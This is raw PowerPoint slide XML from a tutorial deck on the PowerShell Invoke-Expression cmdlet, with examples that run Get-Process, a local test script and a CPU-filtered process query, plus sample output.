                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Expressions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> are evaluated and run in the current scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Description</a:t>
            </a:r>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3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359476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9" y="2492896"/>
            <a:ext cx="8568952" cy="3960439"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:\Users\H&gt;$Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= "Get-Process"</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PS C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Users\H&gt;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-Process</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PS C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Users\H&gt;Invoke-Expression </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$Command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ProcessName</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  ------    -----      ----- -----   ------     --   -----------</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296       4       1572       1956    20       0.53     1348   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AdtAgent</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270       6       1328       800     34       0.06     2396   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alg</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67        2       620        484     20       0.22     716    ati2evxx</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1060      15      12904      11840   74       11.48    892    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CcmExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="147A42"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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1400      33      25280      37544   223      38.44    2564   communicator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="147A42"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Example 1: Evaluate an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Expression</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>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4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310241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0" y="2675467"/>
            <a:ext cx="8640960" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Users\H&gt;Invoke-Expression </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-Command "C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ps-test\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>testscript.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:\Users\H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\ps-test\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>testscript.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-Expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>These commands use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-Expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TestScript.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>, on the local computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>two commands are equivalent. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>first uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0"/>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> parameter to specify the command to run. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>second uses a pipeline operator (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>) to send the command string to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-Expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Example 2: Run a script on the local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>computer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284470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7"/>
            <a:ext cx="8020413" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:\Users\H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Command = 'Get-Process | where {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1000}'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Users\H&gt;Invoke-Expression </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$Command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="147A42"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>example runs a command string that is saved in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> variable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The command string is enclosed in single quotation marks because it includes a variable, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_</a:t>
            </a:r>
            <a:r>
